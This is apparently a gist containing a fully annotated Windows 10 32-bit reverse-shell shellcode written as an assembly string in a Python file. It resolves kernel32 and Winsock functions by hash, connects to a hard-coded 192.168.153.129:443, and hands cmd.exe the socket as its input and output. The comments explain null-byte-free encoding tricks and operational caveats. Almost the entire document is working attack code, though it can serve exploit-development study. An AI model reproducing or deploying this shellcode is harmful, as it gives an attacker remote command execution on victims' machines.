@xct

xct/code.py Secret

Created September 12, 2021 13:46
Windows 10 32-bit reverse-shell shellcode (hard-coded callback to 192.168.153.129:443; see the comments in the listing).
# Windows 10 (32-bit) TCP reverse-shell shellcode as a Keystone-style Intel-syntax
# assembly string. The tuple of adjacent literals is implicitly concatenated into ONE
# str; the assembler/loader that consumes CODE is not part of this file.
#
# Scratch frame (ebp = esp at entry; offsets relative to ebp):
#   [ebp-0x04]  AddressOfNames VA, scratch inside find_function
#   [ebp+0x04]  address of find_function (computed at run time, see find_function_ret)
#   [ebp+0x10]  kernel32 export for hash 0x78b5b983 ("Exit" in the original comment;
#               the final call passes (-1, 0), i.e. the argument shape of
#               TerminateProcess(hProcess, uExitCode) -- hash not decoded here, confirm)
#   [ebp+0x14]  LoadLibraryA        [ebp+0x18]  CreateProcessA
#   [ebp+0x1C]  WSAStartup          [ebp+0x20]  WSASocketA      [ebp+0x24]  WSAConnect
# NOTE(review): ebp+0x04..ebp+0x24 lie ABOVE the entry stack pointer, i.e. inside the
# caller's frame; the shellcode assumes that memory is writable and expendable.
#
# Properties an operator should be aware of (all visible in the code below):
#   * callback IP/port are hard-coded in the sockaddr_in; no retry, no peer verification.
#   * no API return value is ever checked (WSAStartup, WSASocketA, WSAConnect,
#     CreateProcessA); a failed connect still spawns cmd.exe on the unconnected socket.
#   * cmd.exe inherits the socket as stdin/stdout/stderr (bInheritHandles = 1), after
#     which the hosting process is terminated -- whatever the host was doing is lost.
#   * kernel32 is located by the usual heuristic "first loader entry whose BaseDllName is
#     exactly 12 UTF-16 chars", not by comparing the name.
#   * find_function has no "not found" path: an unknown hash returns whatever eax held
#     before the call, and that garbage is then called later.
CODE = (
" start: "
#" int3 ;"  # debug breakpoint, left disabled
" mov ebp, esp ;"  # ebp = frame base for the [ebp+x] slots described above
" add esp, 0xfffff9f0 ;"  # esp -= 0x610; negative immediate keeps the encoding null-byte free
" find_kernel32: "  # standard PEB walk (structure names below are the documented ones for 32-bit Windows)
" xor ecx, ecx ;"
" mov esi,fs:[ecx+30h] ;"  # esi = PEB (fs:[0x30])
" mov esi,[esi+0Ch] ;"  # esi = PEB->Ldr
" mov esi,[esi+1Ch] ;"  # esi = Ldr->InMemoryOrderModuleList.Flink (first entry)
" next_module: "
" mov ebx, [esi+8h] ;"  # ebx = DllBase of this entry (offset from the InMemoryOrder link)
" mov edi, [esi+20h] ;"  # edi = BaseDllName.Buffer (UTF-16)
" mov esi, [esi] ;"  # advance to the next entry before the test (ebx/edi stay valid)
" cmp [edi+12*2], cx ;"  # is the 13th wide char NUL, i.e. is the name exactly 12 chars ("kernel32.dll")?
" jne next_module ;"
" find_function_shorten: "  # obtain find_function's address via a backward call (negative rel32, no null bytes)
" jmp find_function_shorten_bnc ;"
" find_function_ret: "
" pop esi ;" # ret addr, start of find_function
" mov [ebp+0x04], esi ;"  # every resolver below does "call dword ptr [ebp+0x04]"
" jmp resolve_symbols_kernel32 ;"
" find_function_shorten_bnc: "
" call find_function_ret ;" # rel call
" find_function: "  # in: ebx = module base, [esp+4] = ROR13 name hash; out: eax = function VA; other regs preserved by pushad/popad
" pushad ;"  # after this: [esp+0x1c] = saved eax, [esp+0x20] = return address, [esp+0x24] = hash argument
" mov eax, [ebx+0x3c] ;"  # e_lfanew
" mov edi, [ebx+eax+0x78] ;"  # DataDirectory[EXPORT].VirtualAddress
" add edi, ebx ;"  # edi = IMAGE_EXPORT_DIRECTORY*
" mov ecx, [edi+0x18] ;"  # NumberOfNames
" mov eax, [edi+0x20] ;"  # AddressOfNames (RVA)
" add eax, ebx ;"
" mov [ebp-4], eax ;"  # keep AddressOfNames VA; eax is clobbered by the hash loop
" find_function_loop: "
" jecxz find_function_finished ;"  # names exhausted -> falls through to popad with the CALLER's eax unchanged (no error signal)
" dec ecx ;"  # iterate names from last to first
" mov eax, [ebp-4] ;"
" mov esi, [eax+ecx*4] ;"  # RVA of name[ecx]
" add esi, ebx ;"  # esi = char* name
" compute_hash: "  # edx = ROR13 hash of the NUL-terminated ASCII name at esi
" xor eax, eax ;"
" cdq ;"  # edx = 0 (accumulator), via sign-extension of eax = 0
" cld ;"  # lodsb walks forward
" compute_hash_again: "
" lodsb ;"
" test al, al ;"
" jz compute_hash_finished ;"
" ror edx, 0x0d ;"  # hash = ror(hash, 13) + c
" add edx, eax ;"
" jmp compute_hash_again ;"
" compute_hash_finished: "
" find_function_compare: "
" cmp edx, [esp+0x24] ;"  # computed hash vs. the hash argument pushed by the caller
" jnz find_function_loop ;"
" mov edx, [edi+0x24] ;"  # AddressOfNameOrdinals
" add edx, ebx ;"
" mov cx, [edx+2*ecx] ;"  # cx = ordinal for name[ecx] (WORD table); upper half of ecx is already 0 here
" mov edx, [edi+0x1c] ;"  # AddressOfFunctions
" add edx, ebx ;"
" mov eax, [edx+4*ecx] ;"  # function RVA. NOTE(review): forwarded exports (RVA inside the export dir) are not handled
" add eax, ebx ;"
" mov [esp+0x1c], eax ;"  # overwrite the pushad'ed eax so popad returns the VA in eax
" find_function_finished: "
" popad ;"
" ret ;"
" resolve_symbols_kernel32: "  # ebx still = kernel32 base from find_kernel32
" push 0x78b5b983 ;" # Exit hash -- presumably TerminateProcess given the (-1, 0) call at the end; confirm against the hash function
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x10], eax ;"
" push 0xec0e4e8e ;" # LoadLibraryA hash
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x14], eax ;"
" push 0x16b3fe72 ;" # CreateProcessA hash
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x18], eax ;"
" load_ws2_32: "  # builds "ws2_32.dll\0" on the stack, lowest address last
" xor eax, eax ;"
" mov ax, 0x6c6c ;" # ws2_32.dll string pushed in a null byte free way: "ll" + two NULs terminate it
" push eax ;"
" push 0x642e3233 ;"  # "32.d"
" push 0x5f327377 ;"  # "ws2_"
" push esp ;"  # lpLibFileName -> "ws2_32.dll"
" call dword ptr [ebp+0x14] ;" # Call LoadLibraryA, returns handle to module (base addr)
" resolve_symbols_ws2_32: "
" mov ebx, eax ;" # base address of ws2_32.dll -- find_function reads the module base from ebx
" push 0x3bfcedcb ;" # WSAStartup
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x1C], eax ;"
" push 0xadf509d9 ;" # WSASocketA
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x20], eax ;"
" push 0xb32dba0c ;" # WSAConnect
" call dword ptr [ebp+0x04] ;"
" mov [ebp+0x24], eax ;"
" call_wsastartup: " # init Winsock DLL https://docs.microsoft.com/en-us/windows/win32/api/winsock/nf-winsock-wsastartup
" mov eax, esp ;"
" xor ecx, ecx ;"
" mov cx, 0x590 ;"
" sub eax, ecx ;"  # lpWSAData = esp - 0x590. NOTE(review): this buffer sits BELOW esp, in the area WSAStartup's own frames will use; it works in practice but is not a reserved allocation
" push eax ;"  # lpWSAData
" xor eax, eax ;"
" mov ax, 0x0202 ;" # wVersionRequired = 2.2
" push eax ;"
" call dword ptr [ebp+0x1C] ;" # Call WSAStartup -- return value is not checked
" call_wsasocketa: "  # WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); arguments pushed last-first
" xor eax, eax ;"
" push eax ;"  # dwFlags = 0
" push eax ;"  # g = 0
" push eax ;"  # lpProtocolInfo = NULL
" mov al, 0x06 ;" # proto = 6 (TCP)
" push eax ;"
" sub al, 0x05 ;" # 1 = SOCK_STREAM
" push eax ;"
" inc eax ;" # 2 = AF_INET
" push eax ;"
" call dword ptr [ebp+0x20] ;" # Call WSASocketA -- result is used as-is, never compared against INVALID_SOCKET
" call_wsaconnect: "
" mov esi, eax ;"  # esi = socket; reused below as the child's std handles
" xor eax, eax ;"
" push eax ;" # sin_zero[]
" push eax ;" # sin_zero[]
" push 0x8199a8c0 ;" # sin_addr (192.168.153.129) -- bytes c0 a8 99 81, hard-coded callback address
" mov ax, 0xbb01 ;" # sin_port (443) to AX, already in network byte order
" shl eax, 0x10 ;"
" add ax, 0x02 ;"  # sin_family = AF_INET in the low word
" push eax ;" # sin_port & sin_family
" push esp ;" # ptr to the sockaddr_in
" pop edi ;"  # edi = &sockaddr_in
" xor eax, eax ;"
" push eax ;"  # lpGQOS = NULL
" push eax ;"  # lpSQOS = NULL
" push eax ;"  # lpCalleeData = NULL
" push eax ;"  # lpCallerData = NULL
" add al, 0x10 ;"  # sizeof(sockaddr_in) = 16
" push eax ;" # namelen
" push edi ;" # *name
" push esi ;" # s
" call dword ptr [ebp+0x24] ;" # Call WSAConnect -- return value ignored; a failed connect does not stop the shell being spawned
" create_startupinfoa: "  # STARTUPINFOA built on the stack, last field first
" push esi ;" # hStdError  = socket (pushed first because it is the highest-address field)
" push esi ;" # hStdOutput = socket
" push esi ;" # hStdInput  = socket
" xor eax, eax ;"
" push eax ;"  # lpReserved2 = NULL
" push eax ;"  # wShowWindow = 0, cbReserved2 = 0 (one DWORD holds both WORDs)
" mov al, 0x80 ;"
" xor ecx, ecx ;"
" mov cx, 0x80 ;"
" add eax, ecx ;"  # 0x80 + 0x80 = 0x100 = STARTF_USESTDHANDLES, assembled this way to avoid a null byte
" push eax ;"  # dwFlags
" xor eax, eax ;"
" push eax ;"  # dwFillAttribute
" push eax ;"  # dwYCountChars
" push eax ;"  # dwXCountChars
" push eax ;"  # dwYSize
" push eax ;"  # dwXSize
" push eax ;"  # dwY
" push eax ;"  # dwX
" push eax ;"  # lpTitle
" push eax ;"  # lpDesktop
" push eax ;"  # lpReserved
" mov al, 0x44 ;"  # cb = sizeof(STARTUPINFOA) = 0x44
" push eax ;"
" push esp ;"
" pop edi ;"  # edi = &STARTUPINFOA
" create_cmd_string: "  # "cmd.exe\0" on the stack
" mov eax, 0xff9a879b ;"
" neg eax ;"  # eax = 0x00657865 = "exe\0" (negation yields the null terminator without encoding one)
" push eax ;"
" push 0x2e646d63 ;"  # "cmd."
" push esp ;"
" pop ebx ;"  # ebx = "cmd.exe"
" call_createprocessa: " # CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)
" mov eax, esp ;"
" xor ecx, ecx ;"
" mov cx, 0x390 ;"
" sub eax, ecx ;"  # lpProcessInformation = esp - 0x390 (below esp again; the struct is never read back)
" push eax ;" # lpProcessInformation
" push edi ;" # lpStartupInfo
" xor eax, eax ;"
" push eax ;" # lpCurrentDirectory
" push eax ;" # lpEnvironment
" push eax ;" # dwCreationFlags
" inc eax ;"
" push eax ;"  # bInheritHandles = TRUE -- required so the child can use the socket as its std handles
" dec eax ;"
" push eax ;" # lpThreadAttributes
" push eax ;" # lpProcessAttributes
" push ebx ;" # lpCommandLine
" push eax ;" # lpApplicationName
" call dword ptr [ebp+0x18] ;" # Call CreateProcessA -- success is not checked
" exec_shellcode: "  # terminate the host: call the [ebp+0x10] export with (-1, 0)
" xor ecx, ecx ;"
" push ecx ;"  # second argument = 0 (uExitCode if this is TerminateProcess)
" push 0xffffffff ;"  # first argument = -1 (the current-process pseudo-handle)
" call dword ptr [ebp+0x10] ;" # Call the "Exit" export resolved above; does not return
)